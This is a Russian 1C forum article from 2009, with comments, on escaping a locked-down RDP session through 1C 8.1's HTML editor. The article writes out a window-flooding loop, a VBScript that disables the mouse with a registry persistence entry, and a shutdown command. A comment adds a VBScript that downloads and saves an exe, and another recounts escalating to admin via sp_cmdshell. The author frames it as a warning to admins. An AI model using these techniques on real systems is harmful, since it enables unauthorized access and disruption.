Взлом сервера с помощью 1С:Предприятие 8.1

04.02.09

База данных - Инструменты администратора БД

Взлом - это углубленное изучение (с)

Работал с клиентом по rdp. Ночью, конечно же. Как это обычно бывает у фрилансера: кидают на мыло вопросы, дают логин и пароль - сиди, разбирайся до утра, почему что-то не проводится, проводится не так, не попадает в нужный отчет... 

Все бы было хорошо, но в этот раз второпях выделили мне не того пользователя, не с правами администратора, а с правами какого-то удаленного оператора, и передо мной открылся по максимуму урезанный интерфейс «восьмерки», без возможности смены. Свертываю 1С – вижу абсолютно пустой рабочий стол, даже кнопка «Пуск» отсутствует. Сразу видно, сисадмин постарался, чтобы этот самый «удаленный оператор» не лез куда ему не нужно, не смотрел, что не нужно, и кроме пары рабочих документов в 1С ничего не мог открыть. Но мне-то нужно! Нужен конфигуратор, например. Даже – не конфигуратор: достаточно «прощупать» базу собственным отчетом, который бы выводил то, что мне нужно, в табло. Но вот вопрос: как его забросить на компьютер, где сделано все возможное, чтобы этого не допустить? 

Все гениальное возникает на стыке технологий. Впрочем, и абсудное тоже. Интуитивно тыкаю кнопку «Файл» в меню 1С – единственное место на экране, где хоть что-то есть. Вижу пункт «Новый», вижу в списке среди прочего html-документ… 

Решил попробовать: вдруг разработчики 1С таки оставили возможность «пошалить». Перехожу к закладке «Текст», стираю всю сгенерированную там муть, и пишу простенький код:

<html><head>
<script language=javascript>
alert("Hello, world");
</script>
</head><body></body></html>

Затаив дыхание, щелкаю по просмотру… На экране появляется веселое окошечко с приветливым заголовком Microsoft Internet Explorer. Ну надо же! А я и не надеялся… 

Ну чем Explorer с включенными скриптами - не лазейка на закрытый компьютер через rdp? При желании, я его теперь даже отформатирую удаленно!

Но форматировать пока рано: нужно закинуть туда всего лишь свой отчетик. Для этого использую мой любимый файлообменник, а в открытом для смелых идей компоновщике web страниц вместо жизнерадостного алерта с «хелловорлдом» пишу более претенциозное: document.location=”http://www.webfile.ru”; Жму просмотр, забираю скинутый только что свой отчет, сохраняю на рабочем столе для разнообразия. Не люблю пустующих рабочих столов… ;)

К счастью, в интерфейсе удаленного оператора работа с внешними отчетами была не закрытой, и я скоро вывожу в табло те данные по регистрам, которые меня интересуют, а параллельно работает изощренная фантазия... 

Что мешает таким же образом, через файлообменник кинуть на удаленный, закрытый от всего (почти от всего) компьютер, скажем, Total Comander, настроить в нем ftp, найти их базу и выгрузить куда-нибудь? Дома-то работать сподручнее! Конечно, только если это – сервер. А если не сервер, то значит, там есть сеть, а в сети тоже можно найти что-нибудь интересное… 

Впрочем, вместо тотала можно забросить и что-то более веселенькое, да все, что угодно! Забросить и запустить прямо с рабочего стола, например, собственную программу, работающую с реестром… А можно и не с рабочего стола, а прямо из эксплорера, благо, он сам дает возможность не оставлять следов, когда спрашивает по поводу exe-файла, сохранить его, или запустить… Ну чем не взлом?

Кульминацией всего было то, что я вспомнил про свою переписку когда-то с одним хаккером, и про его восхищенные излияния про возможность использования в эксплорере разных ole-объектов, например, вот этот: ActiveXObject("Scripting.FileSystemObject"); Зачем, спрашивается, коммандер, когда есть такое…

Кстати, очень легко можно было бы этот комп завесить, если бы на то подвернулся повод. Как, спрашивается, проще всего завесить Windows – если не созданием этих самых windows? Для этого, в полюбившемся нам компоновщике меняем вторично содержимое нашего скрипта, и вместо window.location ставим:

for(var k=0; k<10000; k++)
  window.open("about:blank");

Попробуйте у себя ради прикола, конечно, снизив число в цикле хотя бы до 5… 

Но поговорим еще о скриптах. Поскольку могучий Эксплорер поддерживает и WBScript, то ни что не мешает отправить сервак на перезагрузку, если незадачливый работодатель сделал вас всего лишь удаленным оператором. Понятно, что такая процедура – весьма не желательна в разгар рабочего дня, когда на сервере висит куча других удаленных операторов и не только…

ExitWindows, может, в XP и не сработает, а вот rundll32 krnl386.exe,exitkernel должен :)

Но не будет столь экстримичны, для начала, ограничимся запретом мыши на сервере:

<script language="vbscript">
<!--
Set Shell=CreateObject("WScript.Shell") 
Shell.Run("rundll32 mouse,disable")
-->
</script>

А если вы - приверженец старой школы, и считаете мышь вообще вредной ошибкой в истории компьютеров, то запретите ее навечно, прописав это в реестр с помощью того же VB!  

WshShell.RegWrite"HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServicesMad", "rundll32 mouse,disable"

Конечно, делать я ничего такого не стал, а клиенту утром сообщил, что их сисадмину стоит серьезно обеспокоиться. Собственно, и сюда публикую только для того, чтобы коллеги, занимающиеся администрированием серверов 1С, учли подобную лазейку и предприняли необходимые меры. 

См. также

Инструментарий разработчика Чистка данных Свертка базы Инструменты администратора БД Системный администратор Программист Руководитель проекта Платформа 1С v8.3 Конфигурации 1cv8 1С:Управление торговлей 10 1С:ERP Управление предприятием 2 1С:Бухгалтерия 3.0 1С:Управление торговлей 11 Россия Платные (руб)

Инструмент представляет собой обработку для проведения свёртки или обрезки баз данных. Работает на ЛЮБЫХ конфигурациях (УТ, БП, ERP и т.д.). Поддерживаются управляемые и обычные формы. Может выполнять свертку сразу нескольких баз данных и выполнять их автоматически без непосредственного участия пользователя.

8400 руб.

20.08.2024    9602    78    33    

86

Инструменты администратора БД Роли и права Системный администратор Программист Пользователь 8.3.14 1С:Розница 2 1С:Управление нашей фирмой 1.6 1С:Документооборот 1С:Зарплата и кадры государственного учреждения 3 1С:Бухгалтерия 3.0 1С:Управление торговлей 11 1С:Комплексная автоматизация 2.х 1С:Зарплата и Управление Персоналом 3.x 1С:Управление нашей фирмой 3.0 1С:Розница 3.0 Платные (руб)

Роли… Вы тратите много времени и сил на подбор ролей среди около 2400 в ERP или 1500 в Рознице 2, пытаясь понять какими правами они обладают? Вы все время смотрите права в конфигураторе или отчетах чтоб создать нормальные профили доступа? Вы хотите наглядно видеть какие права дает профиль и редактировать все в простом виде? А может хотите просто указать подсистему и дать права на просмотр и добавление на объекты и не лезть в дебри прав и чтоб обработка сама подобрала нужные роли? Все это теперь стало возможно! Обновление от 18.09.2024, версия 1.2

16800 руб.

06.12.2023    9344    44    5    

76

SALE! %

Инструменты администратора БД Инструментарий разработчика Роли и права Программист Платформа 1С v8.3 Конфигурации 1cv8 Россия Платные (руб)

Расширение позволяет без изменения кода конфигурации выполнять проверки при вводе данных, скрывать от пользователя недоступные ему данные, выполнять код в обработчиках. Не изменяет данные конфигурации, легко устанавливается практически на любую конфигурацию на управляемых формах.

15000 10000 руб.

10.11.2023    10938    40    27    

66

SALE! %

Инструментарий разработчика Инструменты администратора БД Системный администратор Программист Платформа 1С v8.3 Управляемые формы Конфигурации 1cv8 Россия Платные (руб)

Универсальный инструмент программиста для администрирования конфигураций. Сборник наиболее часто используемых обработок под единым интерфейсом.

4800 3840 руб.

14.01.2013    189232    1146    0    

916

Закрытие периода Инструменты администратора БД Корректировка данных Бухгалтер Пользователь Бухгалтерский учет 1С:Бухгалтерия 3.0 Россия Бухгалтерский учет Платные (руб)

Расширение «Оперативное проведение» в 4 раза уменьшает время проведения документов и закрытия месяца. Является комплексным решением проблем 62 и 60 счетов. Оптимизирует проведение при включенной функциональной опции «Раздельный учет НДС». Используется в более 10 организациях уже 2 года. Совместимо с конфигурацией Бухгалтерия 3.0 (+КОРП).

14400 руб.

29.04.2020    33094    107    152    

73

Инструменты администратора БД Системный администратор Программист Платформа 1С v8.3 Конфигурации 1cv8 Платные (руб)

Брандмауэр для сервера 1С включает в себя управление возможностью начала и возобновления сеансов пользователей по различным условиям, ограничение общего числа возможных сеансов для работы с информационной базой, резервирование возможности работы с информационной базой определенных польззователей, запрет запуска нескольких сеансов для пользователя, журнализация событий начала (возобновления) и завершения (гибернации) сеансов, ведение списка активных сеансов для информационных баз кластера серверов

3600 руб.

06.02.2017    32260    35    18    

51

Архивирование (backup) Инструменты администратора БД Платформа 1С v8.3 Управляемые формы Конфигурации 1cv8 Платные (руб)

Данная разработка позволит решить вопрос с резервным копированием Ваших баз в автоматическом режиме, расположенных на сервере 1С. Система умеет ставить блокировки на вход, блокировать фоновые задания, принудительно отключать сеансы пользователей. И все это система делает в автоматически при создании бэкапа (или через команду). Выгрузка происходит в родной формат 1С - .dt. Так же система умеет архивировать данные выгрузки с установкой пароля. Умеет менять расширение файла zip или dt на любое указанное вами, что позволит сохранить выгрузки от шифровальщика. Может удалять старые копии выгрузок, оставляя указанное количество резервных копий, начиная с самой поздней. Только для WINDOWS!

6000 руб.

06.11.2012    73135    628    45    

86

Инструменты администратора БД Системный администратор Платформа 1С v8.3 1С:Комплексная автоматизация 1.х 1С:Управление производственным предприятием Платные (руб)

Конфигурация Комплексная автоматизация 1.1 (и УПП 1.3 тоже) хранит файлы и изображения в справочнике Хранилище дополнительной информации в реквизите Хранилище типа ХранилищеЗначений. Та же история с ВложениямиЭлектроннойПочты. Но при этом присоединенные файлы в Электронном документообороте хранит в томах на диске. Эта доработка позволяет использовать стандартный механизм хранения файлов, изображений и вложений электронных писем в томах на диске. При этом можно разделить тома хранения по объектам конфигурации.

4200 руб.

10.11.2015    62989    94    59    

79
Комментарии
Подписаться на ответы Инфостарт бот Сортировка: Древо развёрнутое
Свернуть все
1. gutentag 253 05.02.09 00:50 Сейчас в теме
...я как бухгалтер ничего не понял, но покажу статью на работе программерам, может что втолкуют в меня :)
2. Sheyko 22 05.02.09 01:40 Сейчас в теме
расказ про частный случай не настроенного сервера

//в интерфейсе удаленного оператора работа с внешними отчетами была не закрытой
кто-же такую дыру оставляет
//я скоро вывожу в табло те данные по регистрам, которые меня интересуют
про РЛС и права на регистры тоже никто не слышал
//Total Comander, настроить в нем ftp, найти их базу и выгрузить куда-нибудь
база может лежать и не на этом компе. в случае терминал=сервер права win-пользователя на каталог с базой должны спасать
3. O-Planet 6444 05.02.09 01:54 Сейчас в теме
// кто-же такую дыру оставляет
А если по работе требуется?
// база может лежать и не на этом компе
Ну да. Я и пину "если"

А вообще, все правильно: если настраивать все путем, то, думаю, не пройдет. Просто тут ситуация интересная: без 1С все было настроено путем. 1С вносит свои коррективы, собственно, на это и хотел обратить внимание.
4. CheBurator 2684 05.02.09 02:59 Сейчас в теме
Не увидел в статье упоминания про far и шпи...
8. O-Planet 6444 05.02.09 11:22 Сейчас в теме
(4) Far и есть главный шпингалет

(5) Смыс - не в том, что я чего-то не могу, а в том, что имеется возможность покопаться на компе. Например, я, ища место, куда бы сбросить свой отчет, наткнулся на диск D того компа, на котором были папки Клиенты. Я не присматривался особо, но отметил, что в этой папке лежит куча инфы, которкю, предполагалось, не должен видеть удаленный оператор. Тем более, не должен иметь возможности удалять. Вообще, если тему развивать, то можно вспомнить, что имеются способы перестройки прав юзеров в Windows, и вообще, самое большое зло - от кнопки F8

(6) Хаккером я себя чувствовал лишь однажды, когда начальство (я не всегда был фри) поставило задачу сломать до конца недели защиту на одном САПРе для ЧПУ от Siemens, потому что слишком дорогой он был... ;)

(7) Ага. О том - и речь.
10. vip 05.02.09 12:06 Сейчас в теме
(8) > Far и есть главный шпингалет
Не. Не главный.
14. Abadonna 3969 07.02.09 12:19 Сейчас в теме
(8)>Far и есть главный шпингалет
Да уж! Я лучше "Кассирочку" куплю, чем этого долбанного фара юзать буду ;)
defini; DMSDeveloper; O-Planet; +3 1 Ответить
35. artbear 1565 09.02.09 13:35 Сейчас в теме
ОФФ.
(14) Ставлю минус за "долбанный фар" :(
ЗЫ обещал себе не минусовать комменты, но "долбанный фар" достоин минуса, и не одного.
Я, наоборот, ТК не люблю с давних пор, а Фар обожаю за скорость :)
37. Abadonna 3969 09.02.09 14:09 Сейчас в теме
(35) Ставлю минус "за ТК не люблю с давних пор".
Квиты ;)
Минус в уме так же vip_у, Чебурашке и прочим "подфарникам" :)))
38. Abadonna 3969 09.02.09 14:11 Сейчас в теме
(37) Кстати, заметь, написать - написал, но минус ставить не стал ;)
"Фар обожаю за скорость"
И куда вы всё торопитесь?
39. O-Planet 6444 09.02.09 14:17 Сейчас в теме
(38) Они - болящие :) Far - это ублюдочный NC
defini; vasilykushnir; Abadonna; +3 3 Ответить
40. artbear 1565 09.02.09 14:32 Сейчас в теме
(39) Также минус :)
Нортон в свое время был палочкой-выручалочкой для многих вещей.
ЗЫ ну и чтобы плюс уравновесить :)
MarSeN; markers; +2 Ответить
46. vasilykushnir 63 09.02.09 15:03 Сейчас в теме
(40) Тогда минус уравновешиваю. :-)))
(41) А вот эту штукойовину я любил - из толпы VC NC FAR очень выгодно выделялся. Прав Планет - новые времена диктуют новую моду: кто бы что ни говорил, но время ДОС-ориентированных менеджеров благополучно уходят. Не хочу их напрасно хулить - для каждого овоща свой сезон. Так что можно много чего доказывать, но каждый сходит с ума по-своему: у кого вилка в левой руке, а у кого котлета в правой...
42. artbear 1565 09.02.09 14:35 Сейчас в теме
(38) Ну типа хочется же использовать всю мощь компьютера, а не быть белым человека из старой поговорки индейцев апачи - "Белый человек - это тот, кто сидит перед стеклянным экраном и смотрит на песочные часы" :)

ЗЫ Еще с Вин 3 ненавижу эти часики :)
5. artbear 1565 05.02.09 06:57 Сейчас в теме
(0) Если у твоего удаленного оператора нет прав админа, ты нифига не сможешь прописать в системный реестр, HKLM и т.д.
Открытием кучи окон IE ты также завесишь, как правило, только текущий сеанс, хотя, конечно, расход памяти на сервере будет огромный :)
Хотя 2000 народ умудрялся почти подвешивать, открывая огроменные отчеты из 77 за несколько лет :)

Мышку заморозишь ты только для текущего сеанса, который любой админ может удаленно или через тот же терминал завершить.
Форматировать без админских прав ты также не сможешь.
Перезагрузить можешь также только при наличии прав.

Доступ к инету также спокойно обламывается с помощью нормального файервола, настроенного на разграничение не по компам, а по именам пользователей. Да и доступ с основного сервера в инет - это очень плохо :)

И что у нас в итоге остается :) ?
JohnConnor; Spartan; annak2980; forevil; smit1c; charushkin; MrDen; lustin; sasha_r; Gamm; German; JohnyDeath; Shurik; +13 Ответить
6. coder1cv8 3477 05.02.09 08:09 Сейчас в теме
(0) Почувствовал себя хакером? ) Нда...
charushkin; sasha_r; +2 Ответить
7. Shurik 05.02.09 08:35 Сейчас в теме
Это все косяки и/или лень админа.
9. MaxiSoft 61 05.02.09 11:22 Сейчас в теме
вот пока не совсем понял для чего такой извращенный способ для того чтобы просто открыть удаленный отчет или обработку! Ведь если есть права для получения данных из интернета достаточно просто нажать кнопку "Открыть" и в строке имя файла набрать "http://server_id/tools_id.epf" и все 1с спокойненько запустит данную обработку или отчет! Ну а дальше только фантазия и возможности языка 1С.
11. MrDen 435 07.02.09 00:03 Сейчас в теме
А если доступ по RDP не дали то тогда как?
12. O-Planet 6444 07.02.09 04:25 Сейчас в теме
13. Anything 91 07.02.09 12:06 Сейчас в теме
Если есть меню "Файл" -> "Открыть..." и доступ к жесткому диску, можно запустить любую программу.

Для этого в окне выбора кликаем на ней правой кнопкой и выбраем пункт "Открыть". Программа и запустится.

Например, можно было попробовать залезть в папку Windows и запустить Explorer.exe. Возможно, и кнопка "Пуск" появилсь бы...
15. sytkosa 119 07.02.09 13:13 Сейчас в теме
А еще можно на RDP залить файло следующим скриптом... vbs

Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP")
oXMLHTTP.Open "GET", "http://ссылка на файл ", 0 'адрес где лежит файл
oXMLHTTP.Send
Set oADOStream = CreateObject("ADODB.Stream")
oADOStream.Mode = 3
oADOStream.Type = 1
oADOStream.Open
oADOStream.Write oXMLHTTP.responseBody
oADOStream.SaveToFile "C:\file.exe", 2 'куда файл сохранять

и чтоб от такого скрипта зашититься сисадмину крепко репу почесать надо будет...
O-Planet; +1 Ответить
133. user1479482 14 14.03.24 13:11 Сейчас в теме
(15) Господи ну прям как дети. А про AppLocker думаете админы забыли?
Элементарно делаются группы пользователей с применением AppLocker где для определенных групп пользователей блокируются приложения выполняющие скрипты и Group Policy Object (GPO) тоже не кто не отменял там еще более гибко все это настраивается.
16. logarifm 1123 07.02.09 14:50 Сейчас в теме
У меня аналогично был случай только там 1С 7.7 и был доступ к конфигуратору. Но я не мог закачать файл им на сервер так как ИЕ зарезали доступ, а зайти и поменят не могу доменное правило. Блин... Дамаю... Но быстро припоминаю одну ХП в скл. sp_cmdshell, но сходу встретлся с проблемой необходимо узнать пароль sa на sql сервер. Ну благо то, что есть обработки в инете, я быстренько нашел взлом пароля sa из 1С. Буфер обмена работал это тоже благо я быстренько ее через буфер перегнал и запуск. Пароль узнал... А далее, все дело техники! Захожу в СКЛ но опа, админ постарался и прикрыл эту системную хранимку, еще чуток пошарив в инете я нашел команды как ее открыть, открыл эту хранимку и опля уже имею доступ к коммандной строке да еще из правами администратора. Хех жаль только , что локального админа, я быстренько с помощью команды создаю локального админа и на ура вхожу под локальным админом! Все закачую все что нужно... У меня не было за правило взломать, а сделать )) Вот собственно мой опыт по взлому.
17. d.snissarenko 152 07.02.09 17:56 Сейчас в теме
Извините..., но этому бояну уже лет, столько сколько rdp, настоящий бы админ, залочил бы контекстное меню проводника, скрыл диски, запретил гуляние по дискам, только своя папка, запретил открытие ослика. Поэтому к взлому это никакого отношения не имеет, тем паче в системе от обратного (все разрешено, ничего не запрещено). Попробуйте в лине по удаленке с правами юзера ченить замутить :) .
18. d.snissarenko 152 07.02.09 17:58 Сейчас в теме
в этом плане групповые политики рулят
19. 1cHyb 08.02.09 00:07 Сейчас в теме
ИМХО лучше бы работал, а не хнёй занимался! =)
smit1c; sasha_r; +2 Ответить
20. MaxS 2947 08.02.09 07:53 Сейчас в теме
В 1С жмем Файл - Открыть, на любой папке контекстным меню Открыть и попадаем в Windows проводник, ищём исполняемый файл и запускаем.
Пока этих возможностей хватает не прибегая к другим более изощрённым. ;)
21. vde69 925 08.02.09 10:32 Сейчас в теме
а учитывая, что сервер 1с работает под правами локального админа (а часто его ставчт под правами доменного), то кинув простенький скрипт в привелигерованый модуль можно ломать сервер, а от туда вообще все :)

в (0) админ защищал не то :)))
22. Gilev.Vyacheslav 1917 08.02.09 14:44 Сейчас в теме
(0) так понимаю начитавшись тинейджеровкого хакер.ру автора понесло :)))
23. fantasy2 08.02.09 14:54 Сейчас в теме
Простой способ:
в терминале жмём
Ctrl+Alt+End - открвается Диспечер задач
Файл - Новая Задача - "explorer" - Аля Windows !!!..
или в 1С
Файл - Открыть - Окно выбора файла
выбираем любую папку -на ней правцю кнопку мыши - Проводник
- Аля Windows !!!..
25. Abadonna 3969 08.02.09 15:36 Сейчас в теме
(23)>или в 1С Файл - Открыть - Окно выбора файла
Ювыбираем любую папку -на ней правцю кнопку мыши - Проводник
А зачем так сложно? В окне выбора баз жмем кнопку "изменить", а там правую - Проводник.
Олежа "изобрел" всем известный способ, но по- русски: как те отолярингологи
26. O-Planet 6444 08.02.09 19:02 Сейчас в теме
(23) (25) Нет, не пройдет. В моем случае админ сделал что-то, что по трем клавишам ничего не происходило. Я это проверил прежде всего. В (21) правильно написано, что админ защищал не то. Т.е., если туда зайти без 1С, то можно только смотреть на пустой рабочий стол. Собственно, я и хотел донести эту мысль, что если стоит 1С, то сервер нужно защищать несколько в ином ключе.
(22) Надо же, какие сайты ты знаешь. Тож надо глянуть ))
27. Gilev.Vyacheslav 1917 08.02.09 21:21 Сейчас в теме
(26) ты бы почитал http://kb.1c.ru/articleView.jsp?id=37 (конешь понимаю, что проще велосипед изобретать, чем читать чужое)
24. seermak 665 08.02.09 15:04 Сейчас в теме
Я представил, сколько прочитавших все вышеизложенное будут пытаться подломить центральный сервер своей конторы(просто ради интереса , на будущее - пытливые умы).Дайте им еще несколько действительно действенных советов! ;))
28. пользователь 08.02.09 22:39
Сообщение было скрыто модератором.
...
29. O-Planet 6444 08.02.09 23:48 Сейчас в теме
(28) Как раз, 1С. Потому что доступа по rdp ни к чему другому фирмам не требуется, а 1С по rdp сопровождается везде. Я постоянно делаю что-то удаленно, и ни разу не видел, чтобы админы учитывали возможность из 1С копаться в их компьютере. Возможно, многие сисадмины просто достаточно смутно представляют, что такое, 1С. Вот для таких и написал.
30. Дуб 79 09.02.09 08:27 Сейчас в теме
(0) Вообще-то, права на сервер определяются не "дырками" 1С, а степенью криворукости админа. Если каждому встречному-поперечному оставлены полные полномочия - рано или поздно такая система может упасть. Вопрос времени и интереса со стороны доброжелателей.
А так, в целом, насколько помню, доступ через html уже был описан ранее.
Другое дело, если автор додумался сам - то, конечно, молодец. Но описанного ранее этого не отменяет.
31. пользователь 09.02.09 10:50
Сообщение было скрыто модератором.
...
32. sasha_r 09.02.09 12:20 Сейчас в теме
тут, я смотрю, та же бодяга что и на клерк.ру

статья не про взлом сервера при помащи 1с, а про кривые руки недальновидного админа этого сервака и про ненастроенные политики безопастности :(

аффтар, похоже, желает себе дешевой популярности. ну-ну
33. Дуб 79 09.02.09 12:29 Сейчас в теме
Хватит автора клевать. Если он сам нашёл этот путь действия - это очень хорошо его характеризует. Не суть важно, что ко "взлому" это не относится.
DMSDeveloper; sasha_r; +2 Ответить
36. O-Planet 6444 09.02.09 13:54 Сейчас в теме
(33) Люблю js, потому и нашел легко способ его применить. Назвал "взлом", чтобы привлечь внимание админов к теме, только и всего.
34. sasha_r 09.02.09 12:30 Сейчас в теме
2Дуб: ну так назвал бы статью "как я нашел дыру в сервере", а не "взлом сервера при помощи 1С". Разница есть, кмк - причем довольно ощутимая :)
41. Душелов 4021 09.02.09 14:33 Сейчас в теме
Дос навигатор - наше все! :)
markers; Dimasik2007; vasilykushnir; +3 Ответить
43. Abadonna 3969 09.02.09 14:39 Сейчас в теме
У тотала есть одно супер-преимущество - для него есть МОЙ ПЛАГИН, полноценный, а не та жалкая поделка, что под фар идет :)))
44. O-Planet 6444 09.02.09 14:47 Сейчас в теме
А кто-нить "Фрегат" юзал? :) Могу любитенлям фара порекомендовать wd вместо Word, кто помнит такой текстовый редактор. Кстати, очень хороший для 286. А вообще, стоит on-line игруху создавать уже на тему тотальных войн, т.е. истребления культа фаропоклонников доблестными рыцарями TC :)
47. Altair777 645 09.02.09 15:10 Сейчас в теме
(44) Все что угодно, только не Фрегат! :-)

Мало нам браузерных войн, вы еще и файл-менеджерную устроили.
Может, на форуме раздел сделать "Самое лучшее ПО в различных категориях"?
И там сражаться :-)
45. Душелов 4021 09.02.09 14:48 Сейчас в теме
Я смотрю, тут у нас никто не пользуется командной строкой... Ну-ну :)
MegaMouse; MrDen; artbear; +3 Ответить
48. artbear 1565 09.02.09 15:15 Сейчас в теме
(45) Ага, про ком.строку верно замечено :)
49. vasilykushnir 63 09.02.09 15:18 Сейчас в теме
(45), (48) Ага... А потом спрашивают, что такое bat- файл и с чем его жрут, извиняюсь - кушают....
Кстати, на той технике что работал до виндов коммандные файлы имели расширение сом (представляете как поначалу путался?).
50. das 232 09.02.09 15:47 Сейчас в теме
Тема "Защиты серверов и т.д.", которую затронул O-Planet, актуальна для многих. Я с удовольствием прочитала и статью, и комментарии. И, ведь, совсем неважно какое ПО использовать (это я к нашим ГУРУ обращаюсь). Не у всех конечных пользователей настроена система защиты информации должным образом.
Поэтому, искренне считаю данную тему актуальной для многих... Поэтому (+)
vasilykushnir; +1 Ответить
51. vasilykushnir 63 09.02.09 15:55 Сейчас в теме
52. Altair777 645 09.02.09 16:33 Сейчас в теме
(50) Если бы автор еще рассказал как правильно настроить политики безопасности, то и я бы плюсик поставил.
Или хотя бы в шапке дыл ссылочки на статьи, рассказывающие об этом.
А то получается, что озвучена только проблема.
53. vasilykushnir 63 09.02.09 16:50 Сейчас в теме
(52) А если автор не сисадмин? Он обозначил проблему - остальные пусть на ус мотают. У меня к примеру эта проблема так остро не стоит - парочка физических внушений ретивым юзерам мужского полу и порция сквернословия юзерам женского полу - и все решилось полюбовно: они не нарушают - я не наказываю.
55. Altair777 645 09.02.09 17:18 Сейчас в теме
(53) Хорошо, может я сам немножко разгребусь и напишу :-)

И, кстати, при чем тут 1С 8.1? Из под 7-ки точно также ломается.
56. O-Planet 6444 09.02.09 20:37 Сейчас в теме
(55) 7.7 не имеет встроенного эксплорера с загибоном на макетирование по кнопке "Файл" =)
57. Altair777 645 09.02.09 20:40 Сейчас в теме
(56) 7.7 имеет возможность создать файл при открытии через правую кнопочку серого грузына. Хотя не факт, что серого :-)
54. vasilykushnir 63 09.02.09 16:50 Сейчас в теме
58. d.snissarenko 152 10.02.09 21:57 Сейчас в теме
http://citrix.pp.ru/forum/viewtopic.php?t=3426&highlight=Explorer

не деритесь девочки ))) - я эту тему 3 год назад запалил у себя, у меня тогда домена даж не было еще, а о групповых политиках я имел смутнейшее представление, а заходили в базу клиенты, которые удаленно заявки клепали себе.
59. Altair777 645 11.02.09 00:02 Сейчас в теме
(58) > не деритесь девочки )))

это ты кому? нам тут своих хватает флеймистов, так еще и с Мисты пожаловали :-)
http://www.forum.mista.ru/users.php?id=17850
61. d.snissarenko 152 11.02.09 07:10 Сейчас в теме
(59) так для проформы зайди тут в мой профайл и погляди когда я тут зареган :) и когда ты.
60. CheBurator 2684 11.02.09 00:49 Сейчас в теме
На старой работе поднял домен и путем раздал всякие права и ограничения по группам, подразделениям, и т.д. вплоть до принудительной установки корпортаивных обоев и ограничений на запуск приложений - после этого ввод нового юзера заключался во включении его в нужные группы. все. работало года полтора. После ухода и сдачи дел - ОТСОСЕРЫ переставили домен и накатили политики "по умолчанию" - т.е. тупо поставили сервак... На вопрос - а зачем? ответ был простой: у вас там очень сложно было сделано... что сказать - ОТСОСЕРЫ...
Анекдот в тему:
идет операция, хирург, ассистенты и пр.
- Сестра, скальпель!
- Сестра, томпон!
- Сестра, отсос!
- сестра! ОТСТОС - это инструмент!
62. Altair777 645 11.02.09 09:05 Сейчас в теме
Это я видел, ну и что?
А ты так просто зайди в http://infostart.ru/community/people/ и посмотри где я, а где ты?
И рейтинги можешь посмотреть: мой +189, твой +78.
P.S. Кстати, тебе большой минус, что ты на 2 года и почти 3 месяца раньше меня зареган и такой отсталый :-)
63. d.snissarenko 152 11.02.09 10:17 Сейчас в теме
Ну вот и начали меряцо :) , 1с не мой профиль, это хобби :))
64. Altair777 645 11.02.09 10:35 Сейчас в теме
(63) ты сам начал меряться

58. Drock 10.02.2009 21:02:24
не деритесь девочки )))

поэтому я тебе и сказал
76. Abadonna 3969 12.02.09 07:24 Сейчас в теме
(64) Т.к. в фразе "не деритесь девочки )))" не стоит положенная по всем правилам русского языка запятая, фраза обращением считаться не может ;)
Так что зря ты к ней "цепанулся"
77. Altair777 645 12.02.09 08:59 Сейчас в теме
(76) запятая не стоит просто от безграмотности или от торопливости написать гадость.
Кстати, Аркадий, фиксин по этому поводу написал бы "буквоедство детектед" :-)
65. d.snissarenko 152 11.02.09 14:41 Сейчас в теме
Это я сказал к тому, что флейма не по делу развели аж на 3 страницы коментов, если серьезно подходить к вопросу, то нормальный админ политиками так может кастрировать винду, что не один один/неодинэсник ее не разлочит, а то, что у людей разгильдяйство это другой вопрос, меня этот вопрос озадачил, как я ваял выше, в связи с тем, что 1с по удаленке юзали покупатели.
69. Altair777 645 11.02.09 14:49 Сейчас в теме
(65) Какого флейма? И кто? Лично я?
А вот лично ты развел. Го на Мисту! :-)
66. d.snissarenko 152 11.02.09 14:42 Сейчас в теме
67. d.snissarenko 152 11.02.09 14:43 Сейчас в теме
вот если бы он тему обозвал взлом сервера с помощью SAMinside :), без прав и доступа к cmd, было бы интересно...
70. d.snissarenko 152 11.02.09 19:49 Сейчас в теме
Я не я и лошадь не моя [мама мама. меня обижаюююють...]....
Прежде чем кого-то, куда-то посылать, прочти внимательно первые 3 страницы комментариев и поймешь откуда уши выросли в моем первом посте к данной статье.
Так что вопрос флейма считаю закрытым....
Свое мнение к вопросу я высказал в своем первом посте, если хочешь поговорить о флейме или померятся еще чем-то, то милости прошу в личку.

PS// о замерах...
... я считаю, свой рейтинг не по плюсам за комментарии, а по плюсам за статьи и программы, так что твои 189 ниочем отминусуй соточку
71. Altair777 645 11.02.09 19:58 Сейчас в теме
(70) Я-то прочитал, а если бы и ты это сделал, то увидел бы мои комменты по этому поводу.
Вопрос флейма и я буду считать закрытым, когда ты перестанешь троллить.

А по поводу рейтинга за программы: у меня 57, у тебя 28 :-)

А статьи твои были написаны за царя Панька (кроме последней) и потеряли свою актуальность. Кстати, а твои программы еще древнее.

По поводу лички. Обозвал ты меня и 0-Планета девочками (а возможно и остальных участников обсуждения) в открытую, так что и ответ ты получил в том же виде.
72. d.snissarenko 152 11.02.09 20:28 Сейчас в теме
Ахтыбожемой, да успокойся ты уже, как дите малое повелся
74. Altair777 645 11.02.09 20:58 Сейчас в теме
(72) Сюсюкаться ты со своими детками будешь.
(73) мда... долго тебя не было на ИС.
75. d.snissarenko 152 12.02.09 06:55 Сейчас в теме
(74) "Не будешь" - а уже .
Какие-то проблемы с моим возвращением?
73. d.snissarenko 152 11.02.09 20:32 Сейчас в теме
Заметь, статья из популярных не падает. О-планету таки хорошо...
78. d.snissarenko 152 12.02.09 10:06 Сейчас в теме
автор поставил тире :), а о безграмотности и бездуховности автора не тебе судить, поэтому автор предложил тебе все пожелания писать в личку, либо заведи с автором дискуссию на эту тему на форуме, в разделе курилка.
Если ты это принял близко к сердцу, то это твои проблемы, за отсутствие чувства юмора автор ответственности не несет.
79. O-Planet 6444 12.02.09 17:36 Сейчас в теме
И кто-то еще Фиксина обвинял во флуде и неконструктивизме. Фиксин - падаван по сравнению с отдельными джедаями флуда :(
80. Altair777 645 12.02.09 17:46 Сейчас в теме
Прежде чем говорить о том, что кто-то флудит, не мешало бы узнать значение этого слова. Если не учитывать, что слово иногда «флуд» используется как синоним слова «флейм», то лично я не флудил.
Да и не флеймил, кажется.
85. O-Planet 6444 12.02.09 19:27 Сейчас в теме
(80) Да мне по бубну флейм или флуд! Но я вижу во многих топиках десятки твоих неконструктивных комментариев, разные придирки к людям не по делу, как сейчас здесь, разборки, кто плохой. А потом просьбы админам снести пол топика флудофлейма. По теме, если не понимаешь шутливого обращения, приемлемого на профессиональных форумах между коллегами, то это действительно, только твоя проблема.
